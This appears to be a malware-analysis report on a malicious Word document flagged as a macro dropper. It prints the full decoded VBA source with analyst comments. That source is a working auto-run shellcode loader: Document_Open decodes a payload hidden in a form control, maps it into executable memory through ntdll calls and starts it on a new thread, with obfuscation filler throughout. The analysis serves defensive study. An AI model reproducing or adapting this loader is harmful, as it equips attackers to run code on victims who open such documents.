MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic indicates this is a dropper, and the presence of VBA macros confirms its malicious intent. The Document_Open macro is likely responsible for initiating the payload download and execution, although the specific details are obfuscated. The benign URLs extracted are not indicative of malicious activity.
Heuristics 4
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: `End Function Private Sub Document_Open() Dim despotism As String`
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
- http://purl.org/dc/elements/1.1/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/ — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 4fc83c51c82afa0882e1a56ea2df626cf09a41dcc6b2f33b3d146ecd7098e1a0) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14970 bytes |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: header of the document's own class module (ThisDocument). The auto-run
' entry point for this sample is Private Sub Document_Open() further down in this module.
' Filler routine: a textbook Excel array sample that no other procedure in this listing
' references. WorksheetFunction is an Excel object, so in this Word document the last two
' lines would fail at runtime if the routine were ever called — it is not.
Sub Array1()
Dim aiData(10) As Integer
Dim i As Integer
For i = LBound(aiData) To UBound(aiData)
aiData(i) = i
Next i
Debug.Print "Lower Bound = " & LBound(aiData)
Debug.Print "Upper Bound = " & UBound(aiData)
Debug.Print "Num Elements = " & WorksheetFunction.Count(aiData)
Debug.Print "Sum Elements = " & WorksheetFunction.Sum(aiData)
End Sub
' Thin wrapper around compliment, which module metronome declares as NtWriteVirtualMemory.
' Parameters pass straight through: annotation -> destination address, monogynous -> source
' address, puffer -> byte count. The Rnd/Math.Round/SYD calls and the miracle/spirit strings
' are filler that nothing reads. Called twice from bilgewater: once to copy a pointer out of
' its Variant argument, once to copy the decoded payload into freshly allocated memory.
Function appalachia(annotation, monogynous, puffer)
#If Win64 Then
Dim slackening As Variant
Dim onchocerciasis As Long
Dim bacteriolysis As LongPtr
Dim clothespin As LongPtr
Dim alta As LongPtr
Dim creditworthy As Integer
Dim ceratopogon As LongPtr
Dim cumulation As LongPtr
#Else
Dim clothespin As Long
Dim meningeal As String
Dim bacteriolysis As Long
Dim jamais As Integer
Dim ceratopogon As Long
Dim nematoda As Byte
Dim alta As Long
Dim earthgoddess As Byte
Dim cumulation As Long
Dim fondle As String
Dim novosibirsk As String
#End If
imburse = Math.Round(163)
airspeed = Rnd(160.3075 + 305)
clothespin = annotation
cumulation = puffer
airspeed = Math.Round(309)
ceratopogon = monogynous
oleophilic = 3
argyroxiphium = 364
anthemion = 42117
hyoscyamus = 496057
hyoscyamus = SYD(hyoscyamus, anthemion, argyroxiphium, oleophilic)
miracle = spirit
' 49 + 35 - 85 = -1, the current-process pseudo-handle, spelled as arithmetic.
bacteriolysis = 49 + 35 - 85
' NtWriteVirtualMemory(-1, clothespin, ceratopogon, cumulation, alta): alta is never
' initialised (so 0) and only serves as the ByRef bytes-written slot.
compliment ByVal bacteriolysis, clothespin, ceratopogon, cumulation, alta
miracle = "pibroch"
End Function
' Auto-run entry point: executes when the document is opened with macros enabled (the
' OLE_VBA_DOCOPEN heuristic matches this signature). The only meaningful statement is the
' call to shikari; the string concatenation and the Pmt() call are filler.
Private Sub Document_Open()
Dim despotism As String
Dim lessor As Byte
' "de" & "nate" & "d" -> "denated"; never used afterwards.
calidity = "de" & "nate" & "d"
' Hands off to the loader chain.
shikari
deuteranopic = 49
isoetes = 18467
betoken = 433100
isoetes = Pmt(0.0673, deuteranopic, -2346, betoken, 1)
End Sub
' Loader driver, called from Document_Open. Reads the encoded payload out of the "southwest"
' form, decodes it with metronome.chlorine, maps it into executable memory via bilgewater,
' and starts a thread on it via facial (SHCreateThread). Every SYD()/Pmt() call and every
' unused string assignment in this body is filler.
Sub shikari()
Dim girth As Byte
Dim attributive As Integer
' Page count of the open document, pushed into a control on the southwest form (+9).
' southwest is the form module whose header closes this listing; bulgaria is presumably a
' control on it — confirm in the form designer stream.
companion = ThisDocument.ComputeStatistics(wdStatisticPages)
southwest.bulgaria.Value = companion + 9
chumminess = "narratur"
promulgated = "ce" & "ntimo"
nomadize = "dr" & "awbridge"
' The selected item's Name property is where the encoded payload string lives.
Set semiabstraction = southwest.bulgaria.SelectedItem
inwards = 4
mutchkin = 221
carlock = 30183
gourde = 433084
gourde = SYD(gourde, carlock, mutchkin, inwards)
dominant = semiabstraction.Name
' 76 + 104 + 5664 = 5844: keep the last 5844 characters, the fixed length chlorine expects.
positivist = 76 + 104 + 5664
faust = Right(dominant, positivist)
' Decode to raw bytes (returned as a String).
subfamily = metronome.chlorine(faust)
gummite = 2
acinos = 237
brave = 22718
augitic = 176004
augitic = SYD(augitic, brave, acinos, gummite)
crosspurpose = "abigail"
closeknit = "reaumur"
#If Win64 Then
Dim areopagus As String
Dim cheekbone As LongPtr
Dim smarting As LongPtr
Dim bind As Integer
#Else
Dim pitfall As Long
Dim smarting As Long
Dim barbell As String
Dim cheekbone As Long
#End If
gay = 8 + 121 - 129
mer = "internal"
conspicuously = 50 - 44 + 4090
aslope = 5
damkina = 289
jewbush = 44662
plankbed = 297296
plankbed = SYD(plankbed, jewbush, damkina, aslope)
arboraceous = "bl" & "uishness"
fortioribus = "courtierly"
bicuspid = 5
conover = 386
spikebit = 56323
denomination = 542337
denomination = SYD(denomination, spikebit, conover, bicuspid)
accipiter = subfamily
taking = "di" & "sabl" & "ed"
eryngium = "in" & "flictive"
' Allocate executable memory, copy the decoded bytes in; returns the buffer's base address.
cheekbone = bilgewater(accipiter)
midcourse = "bedbug"
omniform = "beglerbeg"
' gregorian = offset into the buffer where execution starts: 34 + 1278 = 1312 on 64-bit,
' 75 + 420 + 2659 = 3154 on 32-bit (the payload presumably has a per-architecture entry).
#If Win64 Then
Dim thereby As Integer
Dim prudential As LongPtr
broken = "agreeing"
nonstandard = "ajuga"
adverbial = "diaspididae"
Dim matchbox As LongPtr
gregorian = 34 + 1278
#Else
aphorism = "truss"
humid = "blandae"
racetrack = "agora"
Dim prudential As Long
dropping = 75 + 420
Dim matchbox As Long
gregorian = dropping + 2659
#End If
Dim nervously As Long
Dim goitrogen As Byte
prudential = 75 - 75
smarting = cheekbone + gregorian
matchbox = 1
' SHCreateThread(pfnThreadProc = buffer + offset, pData = 0, flags = 1, pfnCallback = 0):
' this is the line at which the decoded payload starts running.
quoties = facial(smarting, prudential, matchbox, prudential)
hydrochoeridae = 69
oxide = 31370
psophocarpus = 327158
oxide = Pmt(0.05, hydrochoeridae, -35840, psophocarpus, 1)
End Sub
' Allocates a fresh executable buffer in the current process and copies the decoded payload
' into it. highpowered: the decoded payload (a Variant holding the String chlorine returned).
' Returns the buffer's base address. Uses opuntiales (NtAllocateVirtualMemory) directly and
' compliment (NtWriteVirtualMemory) through appalachia; both are declared in module metronome.
Function bilgewater(highpowered)
Dim mauger As Byte
Dim crabbedness As String
Dim minoxidil As Variant
Dim coadjutant As Variant
#If Win64 Then
Dim cloudtouching As Integer
Dim benignant As LongPtr
' booklet = pointer size for this build: 8 on 64-bit.
booklet = 40 - 32
Dim baryta As LongPtr
Dim utnapishtim As Variant
Dim guinevere As Integer
Dim babe As LongPtr
Dim teemful As Byte
#Else
Dim governorship As Variant
Dim benignant As Long
' booklet = pointer size for this build: 4 on 32-bit.
booklet = 76 - 40 - 32
Dim baryta As Long
Dim hereness As Long
Dim babe As Long
Dim diapheromera As Variant
Dim bimillenial As Byte
#End If
' Copies one pointer-sized value from offset 8 of the Variant argument into benignant —
' presumably the Variant's data slot, i.e. the address of the decoded bytes; verify against
' the VARIANT layout for the build in question.
backwoods = appalachia(VarPtr(benignant), VarPtr(highpowered) + 8, booklet)
' Arguments for NtAllocateVirtualMemory, each spelled as arithmetic:
'   carcase     = -1    ProcessHandle (current process)
'   baryta      = 0     BaseAddress, ByRef, receives the chosen address
'   porterhouse = 0     ZeroBits
'   babe        = 9466  RegionSize, ByRef
'   fluttering  = 4096  AllocationType (matches MEM_COMMIT)
'   tubal       = 64    Protect (matches PAGE_EXECUTE_READWRITE)
carcase = 64 + 27 + 6 - 98
baryta = 69 + 49 + 57 - 175
porterhouse = 15 - 121 - 39 + 145
babe = 76 + 51 + 19 + 9320
fluttering = 59 + 4037
tubal = 23 + 41
asclepiadaceae = opuntiales(ByVal carcase, baryta, ByVal porterhouse, babe, ByVal fluttering, ByVal tubal)
miracle = spirit
spirit = "bone"
' NtWriteVirtualMemory(-1, baryta, benignant, 4384, ...): copy 4384 bytes of decoded payload
' into the new buffer. chlorine produces 5844 / 4 * 3 = 4383 meaningful bytes; the rest of
' its output buffer is zero, so the extra byte is harmless slack.
appalachia baryta, benignant, 4384
bioclimatology = 6
arch = 380
potest = 51188
clonidine = 454828
clonidine = SYD(clonidine, potest, arch, bioclimatology)
' Return the base address of the buffer.
bilgewater = baryta
End Function
Attribute VB_Name = "metronome"
' Analyst note: standard module holding the Win32 API declarations and the payload decoder
' (moderator / chlorine / myelofibrosis). ThisDocument calls into it as metronome.chlorine.
' We are all illuminated,
' Suddenly my eyes are open,
' Suddenly my eyes are open,
' Analyst note: Win32 API imports under throwaway names. The Win64 branch uses PtrSafe /
' LongPtr, the Win32 branch plain Long; each alias is declared in both. Only three are
' referenced anywhere in this listing — compliment (NtWriteVirtualMemory), opuntiales
' (NtAllocateVirtualMemory) and facial (SHCreateThread), the allocate / write / execute
' triple. The rest (PathFileExists, SHGetSettings, SHChangeNotification_Lock, ReadConsoleW,
' SHGetDesktopFolder) are never called and only pad the import list. Note the trailing space
' in "Shlwapi " and "Ntdll.dll ", presumably to dodge exact-string signatures on the library
' name. The lyric comments are filler. Declarations of ntdll Nt* routines inside an Office
' document are a high-confidence detection signal on their own.
#If Win64 Then
'
' Oh, oh tonight?
' You've got to lose inhibition,
' -> SHCreateThread: used in shikari to start a thread on the mapped payload.
Public Declare PtrSafe Function facial Lib "Shlwapi " Alias "SHCreateThread" (ByVal reimburse As LongPtr, ByVal ungenerous As Any, ByVal swartliness As LongPtr, ByVal petulant As LongPtr) As LongPtr
' Romance your ego for a while,
' And try delusion for a while,
' Don't be afraid of tomorrow,
' -> NtWriteVirtualMemory: used via appalachia (pointer fetch and payload copy).
Public Declare PtrSafe Function compliment Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal debouch As Any, ByVal retable As Any, ByVal guzzle As Any, ByVal sottishly As Any, ByVal odious As Any) As LongPtr
' Swing me these sorrows,
' We are, we are, blinding,
' п»їTime waits for no one,
' -> PathFileExists: not referenced.
Public Declare PtrSafe Function carrier Lib "Shlwapi.dll" Alias "PathFileExists" (ectoproct As LongPtr) As LongPtr
' Don't be afraid of tomorrow,
' Romance your ego for a while,
' п»їTime waits for no one,
' -> SHGetSettings: not referenced.
Public Declare PtrSafe Function copetitive Lib "Shell32.dll" Alias "SHGetSettings" (mutual As LongPtr,demonship As LongPtr) As LongPtr
' Suddenly my eyes are open,
' Lights are shining on our faces, blinding
' Everything comes into focus, oh,
' -> SHChangeNotification_Lock: not referenced.
Public Declare PtrSafe Function androgenous Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (examples As LongPtr, eutectic As Any,asp As LongPtr, tone As Any) As Boolean
' Lights are shining on our faces, blinding
' Everything comes into focus, oh,
' So do you want to waste some time?
' -> ReadConsoleW: not referenced.
Public Declare PtrSafe Function audiotape Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal cayenne As LongPtr,frangipani As LongPtr,becalmed As LongPtr,plebeian As LongPtr,malapropism As LongPtr) As Boolean
' We are, we are, blinding
' We are all illuminated,
' Suddenly my eyes are open,
' -> SHGetDesktopFolder: not referenced.
Public Declare PtrSafe Function hemolysin Lib "Shell32.dll" Alias "SHGetDesktopFolder" (hurry As LongPtr)
' Romance your ego for a while,
' Lights are shining on our faces, blinding
' Lights are shining on our faces, blinding
' -> NtAllocateVirtualMemory: used in bilgewater. The fourth parameter is named
' "paradoxicallyByVal" (the space after "paradoxically" is missing), so it is ByRef — which is
' what bilgewater relies on when it passes babe as the RegionSize pointer.
Public Declare PtrSafe Function opuntiales Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (scrimp As LongPtr, profitableness As LongPtr, ByVal animalia As LongPtr,paradoxicallyByVal As LongPtr, ode As LongPtr, ByVal eriodictyon As LongPtr) As LongPtr
' And try delusion for a while,
' Everything comes into focus, oh,
' We are, we are, blinding,
' Everything comes into focus, oh,
' Lights are shining on our faces, blinding
' We are all illuminated,
#Else
' We are all illuminated
' Everything comes into focus, oh,
' Suddenly my eyes are open,
' -> NtWriteVirtualMemory (32-bit declaration).
Public Declare Function compliment Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal satang As Any, ByVal biogeographic As Any, ByVal purseproud As Any, ByVal aeneid As Any, ByVal carpophagous As Any) As Long
' Lights are shining on our faces, blinding
' Don't be afraid of tomorrow,
' We are, we are, blinding
' -> SHCreateThread (32-bit declaration).
Public Declare Function facial Lib "Shlwapi " Alias "SHCreateThread" (ByVal chinaware As Long, ByVal formae As Any, ByVal benefice As Any, ByVal nous As Any) As Long
'
' Everything comes into focus, oh,
' Suddenly my eyes are open,
' -> SHGetSettings: not referenced.
Public Declare Function chowderhead Lib "Shell32.dll" Alias "SHGetSettings" (grigri As Long, moldova As Long) As Long
'
' Suddenly my eyes are open,
' We are all illuminated,
' -> PathFileExists: not referenced.
Public Declare Function alabama Lib "Shlwapi.dll" Alias "PathFileExists" (alopex As Long) As Long
' We are, we are, blinding,
' Everything comes into focus, oh,
' We are, we are, blinding,
' -> SHGetDesktopFolder: not referenced.
Public Declare Function tien Lib "Shell32.dll" Alias "SHGetDesktopFolder" (bryophyte As Long)
'
' Everything comes into focus, oh,
'
' -> ReadConsoleW: not referenced.
Public Declare Function stridulous Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal fanfare As Long, eyeteeth As Long, dragee As Long, maypop As Long, dasyuridae As Long) As Boolean
' Just take my hand, I'll make it feel so much better tonight
' Romance your ego for a while,
' Lights are shining on our faces, blinding
' -> SHChangeNotification_Lock: not referenced.
Public Declare Function screwshaped Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (piscem As Long, epigraphy As Any, headhunter As Long, scraggy As Any) As Boolean
' Lights are shining on our faces, blinding
'
' We are, we are, blinding,
' -> NtAllocateVirtualMemory (32-bit declaration); same missing-space quirk on the fourth
' parameter ("chaffweedByVal"), so RegionSize is ByRef here too.
Public Declare Function opuntiales Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (detrusive As Long, thereto As Long, ByVal norm As Long, chaffweedByVal As Long, crouching As Long, ByVal lucidity As Long) As Long
'
' Its such a beautiful night,
' We are all illuminated,
' Lights are shining on our faces, blinding
' Everything comes into focus, oh,
' Come on, give it a try
#End If
' Swing me these sorrows,
' Suddenly my eyes are open,
' Everything comes into focus, oh,
' Builds the reverse lookup table for the standard base64 alphabet: for each ASCII code the
' table holds that symbol's 6-bit value. 'A'..'Z' (65..90) -> 0..25, '0'..'9' (48..57) ->
' 52..61, 'a'..'z' (97..122) -> 26..51, '/' (47) -> 63, '+' (43) -> 62; every other entry
' stays 0. Returns the 256-entry Byte array; chlorine consumes it as ruction.
Function moderator()
Dim noyade(255) As Byte
' Upper case: 65 - 65 = 0 ... 90 - 65 = 25.
hereditary = 65
Do
noyade(hereditary) = hereditary - 65
hereditary = hereditary + 1
Loop Until hereditary = 91
' Digits: 48 + 4 = 52 ... 57 + 4 = 61.
hereditary = 48
Do
noyade(hereditary) = hereditary + 4
hereditary = hereditary + 1
Loop Until hereditary = 58
' Lower case: 97 - 71 = 26 ... 122 - 71 = 51.
hereditary = 97
Do
noyade(hereditary) = hereditary - 71
hereditary = hereditary + 1
Loop Until hereditary = 123
' The two non-alphanumeric symbols, '/' and '+'.
noyade(47) = 63
hereditary = 43
noyade(hereditary) = 62
moderator = noyade
End Function
' Filler routine: a textbook binary-search sample that nothing in this listing calls.
' Dim intThousand(1000) gives indexes 0..1000 while the fill loop runs 1..1000, so index 0
' stays 0; irrelevant here since the routine is dead code.
Sub Binary_Search_of_Array()
Dim intThousand(1000) As Integer
Dim i As Integer
Dim intTop As Integer
Dim intMiddle As Integer
Dim intBottom As Integer
Dim varUserNumber As Variant
For i = 1 To 1000
intThousand(i) = i
Next i
varUserNumber = 233
intTop = UBound(intThousand)
intBottom = LBound(intThousand)
Do
intMiddle = (intTop + intBottom) / 2
If varUserNumber > intThousand(intMiddle) Then
intBottom = intMiddle + 1
Else
intTop = intMiddle - 1
End If
Loop Until (varUserNumber = intThousand(intMiddle)) _
Or (intBottom > intTop)
If varUserNumber = intThousand(intMiddle) Then
Debug.Print varUserNumber & ", at position " & intMiddle
Else
Debug.Print "not in "
End If
End Sub
' Returns the Unicode code point of the first character of stiffbacked (AscW). Not referenced
' by any other procedure in this listing.
Function approximative(stiffbacked)
approximative = AscW(stiffbacked)
End Function
' Payload decoder, two stages: (1) a per-position offset is added to each input byte (+25 at
' even indexes, +24 at odd), then (2) the result is decoded as standard base64 using the
' reverse-alphabet table from moderator(). myelofibrosis() is a dispatch over integer divide /
' And / multiply so that no shift-style arithmetic appears inline. The input is assumed to be
' at least 5844 bytes (indexes 0..5843 are read unconditionally; a shorter string raises
' "Subscript out of range"). Returns the decoded bytes as a String — VBA copies the Byte array
' verbatim — of which 5844 / 4 * 3 = 4383 bytes are meaningful; the remainder of the
' 6966-byte output buffer stays zero. Most numeric assignments below are unused filler.
Function chlorine(unflattering) As String
Dim stockcar As Long
Dim cloudburst(63) As Long
Dim headed As Variant
Dim thievery As Long
Dim calabash(63) As Long
Dim iroquois As Long
Dim berkelium As Integer
imburse = Math.Round(215)
Dim arctocephalus As Long
Dim foreclose As String
Dim barrenness As String
Dim aconcagua As Long
ambiguas = "taint"
spirit = ambiguas
Dim cytotoxin() As Byte
Dim taka(6965) As Byte
Dim erolia(63) As Long
dusk = 9 + 258039
' Table multipliers: 4096 = 2^12 and (below) 262144 = 2^18, 64 = 2^6.
classifier = 4096
' 117 - 48 - 62 + 16711673 = 16711680 = &HFF0000: mask for the top byte of a 24-bit group.
misdoubt = 117 - 48 - 62 + 16711673
' 65536 = 2^16: divisor that brings the top byte down.
alundum = 65536
Dim colonel As Byte
Dim dermal As String
' 65280 = &HFF00: mask for the middle byte.
bronchiolar = 65280
' 38 - 2 - 13 + 262121 = 262144 = 2^18.
eyeish = 38 - 2 - 13 + 262121
antispast = 63
Dim selfgovernment As Long
' 256 = 2^8: divisor for the middle byte.
donative = 256
frock = 16515072
taichung = 118 + 103 + 3811
' 255: mask for the low byte.
quacksalver = 255
' 64 = 2^6.
legitimateness = 64
Dim cowfish As Integer
fairy = 108 - 108
illustrator = 5843
Dim artiodactyla() As Byte
' Input as ANSI bytes.
artiodactyla = VBA.StrConv(unflattering, vbFromUnicode)
Dim flatmate As Byte
grippe = 38
image = 27861
chara = 229883
image = Pmt(0.0714, grippe, -7479, chara, 0)
' Last index processed: the decoder reads exactly 5844 bytes.
miasmic = 5843
protogeometric = 35
' Sqr(100) / Sqr(4) + 20 = 10 / 2 + 20 = 25.
abscessed = Sqr(100) / Sqr(4) + 20
' Stage 1: undo the per-byte offset (+25 at even positions, +24 at odd). Assigning a value
' above 255 to a Byte element would raise Overflow, so the encoder presumably kept the
' pre-offset values in range.
For brittleness = 0 To miasmic
If brittleness Mod 2 = 0 Then
artiodactyla(brittleness) = artiodactyla(brittleness) + abscessed
Else
artiodactyla(brittleness) = artiodactyla(brittleness) + abscessed - 1
End If
Next brittleness
winner = 81
genera = 29174
cynically = 383707
genera = Pmt(0.0415, winner, -31595, cynically, 1)
berkelium = 0
regum = 121 + 108 - 81 - 148
catatonic = 43
' base64 reverse-alphabet table (ASCII code -> 6-bit value).
ruction = moderator
' Precomputed "shift" tables for 6-bit values: erolia(i) = i * 64 (<< 6),
' calabash(i) = i * 4096 (<< 12), cloudburst(i) = i * 262144 (<< 18).
For arctocephalus = 0 To 63
erolia(arctocephalus) = myelofibrosis(arctocephalus, legitimateness, 3)
calabash(arctocephalus) = myelofibrosis(arctocephalus, classifier, 3)
cloudburst(arctocephalus) = myelofibrosis(arctocephalus, eyeish, 3)
Next arctocephalus
fornix = 25
blowfish = 33039
headful = 527140
blowfish = Pmt(0.0607, fornix, -7987, headful, 0)
cytotoxin = artiodactyla
agronomist = 4
all = 3
Wrap = 338
newscast = 34043
margaret = 155694
margaret = SYD(margaret, newscast, Wrap, all)
' 23 + 83 - 14 - 89 = 3: offset of the fourth symbol in each group.
mouthy = 23 + 83 - 14 - 89
miracle = spirit
airspeed = Fix(219.6105 + 214)
lots = mouthy + 1
' Output advances 3 bytes per group (kentuckian + 1).
kentuckian = 2
' Stage 2: each run of four symbols becomes the 24-bit value
' c0 << 18 | c1 << 12 | c2 << 6 | c3, split into three output bytes. iroquois is advanced by
' 3 inside the loop plus 1 by Next, i.e. a stride of 4.
For iroquois = 0 To miasmic
halfhardy = cytotoxin(iroquois)
methodize = cytotoxin(iroquois + 2)
stockcar = cloudburst(ruction(halfhardy)) _
+ calabash(ruction(cytotoxin(iroquois + 1))) + erolia(ruction(methodize)) + ruction(cytotoxin(iroquois + mouthy))
' (stockcar And &HFF0000) \ 65536 -> top byte
arctocephalus = myelofibrosis(stockcar, misdoubt, 2)
taka(thievery) = myelofibrosis(arctocephalus, alundum, 1)
' (stockcar And &HFF00) \ 256 -> middle byte
arctocephalus = myelofibrosis(stockcar, bronchiolar, 2)
taka(thievery + 1) = myelofibrosis(arctocephalus, donative, 1)
' stockcar And 255 -> low byte
taka(thievery + kentuckian) = myelofibrosis(stockcar, quacksalver, 2)
thievery = thievery + kentuckian + 1
iroquois = iroquois + 3
Next
chlorine = taka
End Function
' Arithmetic dispatcher used by chlorine so that the decoder's masks and shifts are not
' written inline: entomophthoraceae selects the operation applied to belie and qualm.
'   1 -> belie \ qualm   (integer divide; used as a right shift by a power of two)
'   2 -> belie And qualm (bit mask)
'   3 -> belie * qualm   (used as a left shift by a power of two)
' Any other selector leaves the return value Empty.
Function myelofibrosis(belie, qualm, entomophthoraceae)
Select Case entomophthoraceae
Case 1
myelofibrosis = belie \ qualm
Case 2
myelofibrosis = belie And qualm
Case 3
myelofibrosis = belie * qualm
End Select
End Function
Attribute VB_Name = "southwest"
Attribute VB_Base = "0{1FA9F984-494C-4C72-BDEB-7E487E0E348B}{EAB79449-7FFE-418C-899C-F11CFA7ABF48}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: the two-GUID VB_Base value is the shape of a UserForm (designer) module. No
' code is shown for it; shikari reads southwest.bulgaria.SelectedItem.Name, so the encoded
' payload appears to be stored in a control property of this form — confirm by inspecting the
' form's designer stream, which this preview does not include.